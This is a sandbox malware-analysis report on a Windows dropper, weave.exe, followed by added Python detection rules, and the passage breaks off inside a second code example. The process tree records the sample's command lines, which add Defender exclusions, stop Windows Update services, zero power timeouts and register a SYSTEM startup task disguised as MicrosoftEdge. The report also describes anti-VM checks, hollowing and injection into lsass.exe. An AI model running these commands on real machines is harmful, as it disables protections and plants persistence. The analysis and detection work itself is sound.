Analysis
max time kernel: 17s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 27/09/2024, 18:31
Static task: static1
Behavioral task: behavioral1
Sample: weave.exe
Resource: win11-20240802-en
General
Target: weave.exe
Size: 18.2MB
MD5: f293ebde82be4a4c20f5b58a05384108
SHA1: 2240637695575a69e8918a9e9083d8f6d6a25356
SHA256: 6ee011dc3dc0568d97acddc89bfbae917c42a811a99cd851e17bae209e9e7506
SHA512: a1a222e1203baad3141f2fbf3fca6f511842556c8175cdc6ea735e494aa9e923ef53d906c79bf53af1a1ec1e113cd70e5f06fb6068faf89912726e520e592224
SSDEEP: 393216:duxU/9YlNS1YOmAP0ybcsOCdha3hgw7KQs6Qg5H2Ym8IBX3Iv:dP/9YzC3csZa3hgRgJIBXE
Malware Config
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (6 IoCs)
A process was created with an explicitly chosen parent, so the parent recorded on the new process is not the process that called NtCreateUserProcess (parent PID spoofing).
description | pid | Process | procid_target
PID 2316 created a process with parent PID 3384 | 2316 | updater.exe | 52 (six identical entries)
PID 3384 is Explorer.EXE in the process tree below. The six processes listed directly under Explorer.EXE that are not weave.exe (powershell.exe 2344, cmd.exe 3008, cmd.exe 1068, dialer.exe 2352, powershell.exe 1164 and schtasks.exe 2104) are the ones updater.exe spawned this way; a tree built from recorded parents alone hides that updater.exe is their real origin.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cli_gui.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
Runs PowerShell to modify Windows Defender settings by adding exclusions. The signature covers exclusions for file extensions, paths and processes; in this run only -ExclusionPath is used, for C:\windows\system32, $env:UserProfile and $env:ProgramFiles (three of the four invocations). The fourth invocation (PID 1164) registers the scheduled task described under "Uses Task Scheduler COM API".
pid | Process: 4016 powershell.exe, 2344 powershell.exe, 2548 powershell.exe, 1164 powershell.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cli_gui.exe
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cli_gui.exe

Executes dropped EXE (3 IoCs)
pid | Process: 3372 cli_gui.exe, 2316 updater.exe, 4700 updater.exe

Indicator Removal: Clear Windows Event Logs (1 TTP, 2 IoCs)
Clears Windows Event Logs to hide the activity of an intrusion.
File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
Both writes come from the EventLog service host (svchost.exe -s EventLog, PID 1428 in the tree), which is the legitimate owner of these files, so on its own this is a weak indicator. Corroborate with Security event 1102 or System event 104 (log cleared) before treating it as anti-forensics.

YARA rule themida (3 IoCs)
resource | yara_rule
behavioral1/files/0x000500000002aac3-9.dat | themida
behavioral1/memory/3372-20-0x00007FF6A0DB0000-0x00007FF6A15E9000-memory.dmp | themida
behavioral1/memory/3372-49-0x00007FF6A0DB0000-0x00007FF6A15E9000-memory.dmp | themida
PID 3372 is cli_gui.exe: both the dropped file and its in-memory image match the Themida protector signature, consistent with the anti-debug and anti-VM checks attributed to that process.

Checks whether UAC is enabled (1 IoC)
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | cli_gui.exe
Power Settings (1 TTP, 5 IoCs)
powercfg controls all configurable power settings on a Windows system and can be abused to keep an infected host from sleeping, hibernating, locking or shutting down. Here every hibernate and standby timeout is set to 0 (never), on both AC and DC power.
pid | Process: 2496 powercfg.exe, 1728 powercfg.exe, 1068 cmd.exe, 3376 powercfg.exe, 1660 powercfg.exe

Drops file in System32 directory (3 IoCs)
File created: C:\Windows\system32\syscfg.cfg | weave.exe
File created: C:\Windows\system32\updater.exe | weave.exe
File opened for modification: C:\Windows\System32\Tasks\MicrosoftEdge | svchost.exe (the Task Scheduler service host, PID 1152, writing the definition of the MicrosoftEdge task registered later in the run)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | Process: 3532 weave.exe, 3372 cli_gui.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 2316 set thread context of 2352 | 2316 | updater.exe | 100
PID 2352 is dialer.exe. Together with the WriteProcessMemory entry from 2316 into 2352 below, this is the process hollowing pattern: updater.exe starts dialer.exe, writes into its memory and redirects a thread into the written code.

Drops file in Program Files directory (1 IoC)
File created: C:\Program Files\Microsoft\Edge\updater.exe | updater.exe
This is the path the MicrosoftEdge scheduled task executes, so the copy in the Edge directory is the persistent stage.

Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system. Here it stops the Windows Update and delivery services UsoSvc, WaaSMedicSvc, wuauserv, bits and dosvc.
pid | Process: 3424 sc.exe, 4808 sc.exe, 1344 sc.exe, 2592 sc.exe, 3404 sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | weave.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs; the list is capped at 64)
Entries per process: 3532 weave.exe (8), 2548 powershell.exe (2), 3372 cli_gui.exe (4), 4016 powershell.exe (2), 2316 updater.exe (12), 2344 powershell.exe (2), 1164 powershell.exe (3), 2352 dialer.exe (31). The enumeration by dialer.exe precedes its writes into the system processes listed under WriteProcessMemory below.

Suspicious use of AdjustPrivilegeToken (64 IoCs; the list is capped at 64)
SeDebugPrivilege: 2548 powershell.exe, 4016 powershell.exe, 2344 powershell.exe, 2352 dialer.exe, 1164 powershell.exe
SeShutdownPrivilege and SeCreatePagefilePrivilege: 3376, 1660, 2496 and 1728 powercfg.exe
1164 powershell.exe additionally enabled SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and the privileges reported numerically as 33, 34, 35 and 36
2620 svchost.exe (the Winmgmt service host) repeatedly enabled SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege and SeManageVolumePrivilege (two full cycles and part of a third before the cap)
SeDebugPrivilege in dialer.exe is the one to note: it is what a hollowed GUI utility needs to open lsass.exe and winlogon.exe for writing.

Suspicious use of WriteProcessMemory (64 IoCs; the list is capped at 64)
Parent-to-child writes, which accompany normal process creation (each recorded twice):
3532 weave.exe wrote to 3372 cli_gui.exe and 2316 updater.exe
3372 cli_gui.exe wrote to cmd.exe 1972, 3980, 3408, 4620, 4804 and 388
1972 cmd.exe wrote to 2548 powershell.exe; 4804 cmd.exe wrote to 4016 powershell.exe
3008 cmd.exe wrote to sc.exe 2592, 3404, 3424, 4808 and 1344
1068 cmd.exe wrote to powercfg.exe 3376, 1660, 2496 and 1728
Injection:
2316 updater.exe wrote to 2352 dialer.exe (the hollowing target; see SetThreadContext above)
2352 dialer.exe wrote into 25 pre-existing system processes: winlogon.exe 636, lsass.exe 684, dwm.exe 428, and the svchost.exe instances 988 (LSM), 556 (lmhosts), 536 (gpsvc), 1028 (NcbService), 1044 (TimeBrokerSvc), 1152 (Schedule), 1208 (nsi), 1260 (ProfSvc), 1296 (DispBrokerDesktopSvc), 1308 (netprofm), 1408 (UserManager), 1428 (EventLog), 1500 (EventSystem), 1516 (Themes), 1648 (SENS), 1708 (AudioEndpointBuilder), 1748, 1760, 1808 (Dhcp), 1816, 1828 and 1908 (ShellHWDetection)
Writes into lsass.exe and winlogon.exe from a user-mode utility that owns none of them are the strongest single indicator in this report.

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
This corresponds to the Register-ScheduledTask call in the process tree (task MicrosoftEdge, action C:\Program Files\Microsoft\Edge\updater.exe, trigger at startup, user System, run level Highest). The task is then started immediately with schtasks /run, which is why updater.exe PID 4700 appears as a child of the Schedule service host rather than of the dropper.
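The signatures above reduce to a handful of command-line patterns: Add-MpPreference exclusions, sc stop of the update services, powercfg timeouts set to 0, a SYSTEM/Highest startup task, and dialer.exe started without arguments. The following is an added example (not part of the tria.ge report) that encodes those patterns as rules over generic process-creation records; the events at the bottom are constructed from the command lines recorded in the process tree, and the record shape (pid, ppid, image, cmdline) is this example's own rather than any vendor's schema. The ARGLESS_HOSTS list is an assumption to be replaced by your own baseline.

```python
"""Command-line detection rules for the behaviour recorded in this report.

Added example, not part of the tria.ge report. The events at the bottom are
constructed from the command lines in the report's process tree; the record
shape (pid, ppid, image, cmdline) is generic rather than any vendor's schema.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Windows Update / delivery services the sample stops with sc.exe.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# GUI binaries rarely started without arguments except to host injected code
# (assumption for this example; derive the list from your own baseline).
ARGLESS_HOSTS = {"dialer.exe"}

RE_DEFENDER_EXCL = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I)
RE_SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+([A-Za-z0-9_]+)", re.I)
RE_POWERCFG_ZERO = re.compile(r"-(?:hibernate|standby|monitor)-timeout-(?:ac|dc)\s+0\b", re.I)
RE_TASK_CREATE = re.compile(r"Register-ScheduledTask\b|\bschtasks(?:\.exe)?\s+/create\b", re.I)
RE_TASK_NAME = re.compile(r"(?:-TaskName|/tn)\s+['\"]*([^'\"\s]+)", re.I)
RE_TASK_EXEC = re.compile(r"(?:-Execute|/tr)\s+['\"]+([^'\"]+)", re.I)
RE_TASK_SYSTEM = re.compile(r"(?:-User|/ru)\s+['\"]*System\b", re.I)
RE_TASK_HIGHEST = re.compile(r"(?:-RunLevel|/rl)\s+['\"]*Highest\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list:
    """Return (rule, detail) pairs raised by one process-creation event."""
    hits, cmd = [], ev.cmdline
    if RE_DEFENDER_EXCL.search(cmd):
        hits.append(("defender_exclusion_added", cmd))
    stopped = {m.group(1).lower() for m in RE_SC_STOP.finditer(cmd)} & UPDATE_SERVICES
    if stopped:
        hits.append(("update_services_stopped", ",".join(sorted(stopped))))
    if RE_POWERCFG_ZERO.search(cmd):
        hits.append(("power_timeouts_zeroed", cmd))
    if RE_TASK_CREATE.search(cmd):
        name, exe = RE_TASK_NAME.search(cmd), RE_TASK_EXEC.search(cmd)
        hits.append(("privileged_startup_task", "name=%s exec=%s system=%s highest=%s" % (
            name.group(1) if name else "?", exe.group(1) if exe else "?",
            bool(RE_TASK_SYSTEM.search(cmd)), bool(RE_TASK_HIGHEST.search(cmd)))))
    # Image launched with an empty argument list, e.g. dialer.exe as a hollowing host.
    if basename(ev.image) in ARGLESS_HOSTS and cmd.strip().strip('"').lower() == ev.image.lower():
        hits.append(("argless_injection_host", basename(ev.image)))
    return hits


def scan(events) -> dict:
    """Map each rule name to the sorted PIDs that triggered it."""
    by_rule = defaultdict(set)
    for ev in events:
        for rule, _detail in check_event(ev):
            by_rule[rule].add(ev.pid)
    return {rule: sorted(pids) for rule, pids in by_rule.items()}


# Constructed from the report's process tree (PIDs and command lines as recorded;
# the task-registration line is abridged to its action, trigger and account).
SAMPLE_EVENTS = [
    ProcEvent(3532, 3384, r"C:\Users\Admin\AppData\Local\Temp\weave.exe", r'"C:\Users\Admin\AppData\Local\Temp\weave.exe"'),
    ProcEvent(1972, 3372, r"C:\Windows\system32\cmd.exe", r'''C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&1'''),
    ProcEvent(2548, 1972, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"'''),
    ProcEvent(2344, 3384, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcEvent(3008, 3384, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"),
    ProcEvent(2592, 3008, r"C:\Windows\System32\sc.exe", "sc stop UsoSvc"),
    ProcEvent(1068, 3384, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"),
    ProcEvent(2352, 3384, r"C:\Windows\System32\dialer.exe", r"C:\Windows\System32\dialer.exe"),
    ProcEvent(1164, 3384, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }"""),
    ProcEvent(2104, 3384, r"C:\Windows\System32\schtasks.exe", r'C:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"'),
]

if __name__ == "__main__":
    for rule, pids in sorted(scan(SAMPLE_EVENTS).items()):
        print(f"{rule:26s} pids={pids}")
```

The cmd.exe wrappers fire the same rules as the PowerShell and sc.exe children they spawn, which is intended: on a host where command-line logging exists only for one of the two, the rule still catches the chain. Each rule on its own has benign matches (administrators do add Defender exclusions and create SYSTEM tasks); three or more of them from one process lineage within a short window is the signal that matches this report.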
Processes
Each entry is "PID | image | command line as recorded"; indentation follows the parent recorded for each process, and signature tags are listed under the process that raised them. The six processes under Explorer.EXE that are not weave.exe (PIDs 2344, 3008, 1068, 2352, 1164 and 2104) carry a spoofed parent: per the NtCreateUserProcessOtherParentProcess signature they were created by updater.exe (PID 2316) with Explorer.EXE (PID 3384) named as parent.

PID 636 | C:\Windows\system32\winlogon.exe | winlogon.exe
    PID 428 | C:\Windows\system32\dwm.exe | "dwm.exe"
PID 684 | C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
PID 988 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
PID 556 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
PID 536 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
PID 1028 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
PID 1044 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
PID 1152 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    - Drops file in System32 directory
    PID 4700 | C:\Program Files\Microsoft\Edge\updater.exe | "C:\Program Files\Microsoft\Edge\updater.exe"
        - Executes dropped EXE
PID 1208 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
PID 1260 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
PID 1296 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
PID 1308 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
PID 1408 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    PID 3048 | C:\Windows\system32\sihost.exe | sihost.exe
PID 1428 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
    - Indicator Removal: Clear Windows Event Logs
PID 1500 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
PID 1516 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
PID 1648 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
PID 1708 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
PID 1748 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p
PID 1760 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
PID 1808 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
PID 1816 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
PID 1828 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
PID 1908 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
PID 1916 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
PID 1368 | C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
PID 2184 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
PID 2384 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
PID 2552 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
PID 2560 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
PID 2580 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p
PID 2604 | C:\Windows\sysmon.exe | C:\Windows\sysmon.exe
PID 2628 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
PID 2620 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
    - Suspicious use of AdjustPrivilegeToken
PID 2640 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
PID 2748 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
PID 2844 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
PID 3120 | C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding
PID 3384 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
    PID 3532 | C:\Users\Admin\AppData\Local\Temp\weave.exe | "C:\Users\Admin\AppData\Local\Temp\weave.exe"
        - Drops file in System32 directory
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID 3372 | C:\Users\Admin\AppData\Local\Temp\cli_gui.exe | "C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            PID 1636 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID 1972 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&1
                - Suspicious use of WriteProcessMemory
                PID 2548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
            PID 3980 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
            PID 3408 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
            PID 4620 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
            PID 4804 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&1
                - Suspicious use of WriteProcessMemory
                PID 4016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
            PID 388 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
            PID 1548 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
            PID 2852 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
        PID 2316 | C:\Windows\system32\updater.exe | "C:\Windows\system32\updater.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
    PID 2344 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force   (parent spoofed; created by PID 2316)
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    PID 3008 | C:\Windows\System32\cmd.exe | C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc   (parent spoofed; created by PID 2316)
        - Suspicious use of WriteProcessMemory
        PID 2592 | C:\Windows\System32\sc.exe | sc stop UsoSvc
            - Launches sc.exe
        PID 3404 | C:\Windows\System32\sc.exe | sc stop WaaSMedicSvc
            - Launches sc.exe
        PID 3424 | C:\Windows\System32\sc.exe | sc stop wuauserv
            - Launches sc.exe
        PID 4808 | C:\Windows\System32\sc.exe | sc stop bits
            - Launches sc.exe
        PID 1344 | C:\Windows\System32\sc.exe | sc stop dosvc
            - Launches sc.exe
    PID 1068 | C:\Windows\System32\cmd.exe | C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0   (parent spoofed; created by PID 2316)
        - Power Settings
        - Suspicious use of WriteProcessMemory
        PID 3376 | C:\Windows\System32\powercfg.exe | powercfg /x -hibernate-timeout-ac 0
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
        PID 1660 | C:\Windows\System32\powercfg.exe | powercfg /x -hibernate-timeout-dc 0
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
        PID 2496 | C:\Windows\System32\powercfg.exe | powercfg /x -standby-timeout-ac 0
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
        PID 1728 | C:\Windows\System32\powercfg.exe | powercfg /x -standby-timeout-dc 0
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
    PID 2352 | C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe   (parent spoofed; created and hollowed by PID 2316)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
    PID 1164 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }   (parent spoofed; created by PID 2316)
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 3956 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID 2104 | C:\Windows\System32\schtasks.exe | C:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"   (parent spoofed; created by PID 2316)
        PID 1012 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
PID 3508 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
PID 3544 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
PID 3940 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 4044 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
PID 4052 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
PID 2940 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID 4352 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
PID 4364 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
PID 3396 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
PID 3960 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
PID 888 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
PID 4900 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
PID 4092 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
PID 4152 | C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding
PID 2452 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
PID 700 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
PID 4160 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID 1508 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
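The tree above is drawn from recorded parents, so it places updater.exe's six children under Explorer.EXE and shows nothing of the writes from dialer.exe into lsass.exe, winlogon.exe and the service hosts. Three API-level facts from the signatures section are enough to recover what actually happened: who called NtCreateUserProcess and which parent the new process was given, who set whose thread context, and who wrote into whom. The following is an added example (not part of the tria.ge report) that derives parent spoofing, hollowing and injection fan-out from such records; the record types are this example's own, and the event lists are constructed from the PIDs in this report with the foreign write targets abridged. SENSITIVE and FANOUT_MIN are assumptions to tune.

```python
"""Reconstructing parent spoofing, hollowing and injection fan-out from
API-level telemetry.

Added example, not part of the tria.ge report. The record types mirror the
three facts the sandbox logged for this sample (which process called
NtCreateUserProcess and which parent the new process was given, who set whose
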